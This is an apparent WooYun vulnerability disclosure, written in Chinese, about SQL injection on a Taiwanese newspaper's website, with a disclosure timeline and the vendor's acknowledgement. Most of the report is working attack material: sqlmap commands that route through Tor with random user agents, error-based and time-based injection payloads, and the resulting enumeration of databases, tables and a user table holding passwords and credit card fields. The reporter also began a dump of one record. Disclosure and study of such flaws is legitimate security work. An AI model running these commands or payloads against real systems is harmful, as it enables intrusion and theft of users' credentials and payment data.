乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-30: 细节已通知厂商并且等待厂商处理中 2015-11-02: 厂商已经确认,细节仅向厂商公开 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
台湾某报SQL注入影响3千用户信息(包括银行卡信息)
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --technique=BEUT -u "http://**.**.**.**/guidepost/sp.asp" --data="sC=b" --dbs --is-dba --current-db---Parameter: sC (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: sC=b' AND 4193=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4193=4193) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'jhKo'='jhKo Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: sC=b' WAITFOR DELAY '0:0:20'-----
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000current database: 'sp'current user is DBA: Falseavailable databases [9]:[*] absolutebm[*] cpnews[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] sp[*] tempdbDatabase: sp+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.sptests | 10103 || dbo.sp_headlinenews | 8318 || dbo.guidepost | 4510 || dbo.mp3_user | 3346 || dbo.mp3_user1 | 1804 || dbo.inews_daily | 1770 || dbo.articles | 1409 || dbo.v_photogallery | 1192 || dbo.sp_contents | 1106 || dbo.sp_convert_20150616 | 847 || dbo.inews_contents | 770 || dbo.mp3_contents | 756 || dbo.sp_print1 | 474 || dbo.sp_newtimestamp | 415 || dbo.three | 207 || dbo.sp_n_contents | 201 || dbo.inews_newtimestamp | 155 || dbo.sp_timestamp | 104 || dbo.one | 103 || dbo.sun | 75 || dbo.i380 | 73 || dbo.exam_user | 57 || dbo.cptests | 31 || dbo.sysconstraints | 17 || dbo.sp_online | 16 || dbo.sp_print | 16 || dbo.syssegments | 3 || dbo.mp3_samples | 1 || dbo.onlyLogin | 1 || dbo.textlink | 1 |+-------------------------+---------+Database: spTable: mp3_user ====> 这里某个列应该存储了信用卡信息,因为我尝试(仅仅是尝试,并未dump完,也未保存信息)dump第一条信息时发现有个列存储的是Visa, 看到这条记录我就取消了dump,并未看到真正的号码.[25 columns]+----------------+---------------+| Column | Type |+----------------+---------------+| active | int || address | varchar || birthday | smalldatetime || e_issue | int || email | varchar || gender | varchar || id | int || login_id | varchar || login_password | varchar || name | varchar || o_date | smalldatetime || o_type | int || ocardcode | varchar || ocardexpires | varchar || ocardno | varchar || ocardtype | varchar || price | int || profession | varchar || re_date | smalldatetime || reminder | int || renew | int || s_issue | int || sw_date | smalldatetime || telephone | varchar || tracer_id | varchar |+----------------+---------------+
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUT --union-char=N -u "http://**.**.**.**/guidepost/sp.asp" --data="sC=b" --dump -Dsp -Tmp3_user --stop 1[11:48:52] [INFO] resumed: Visa最后,再次申明: 仅证明漏洞存在,未dump任何用户讯息.
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-11-02 00:47
感謝通報
暂无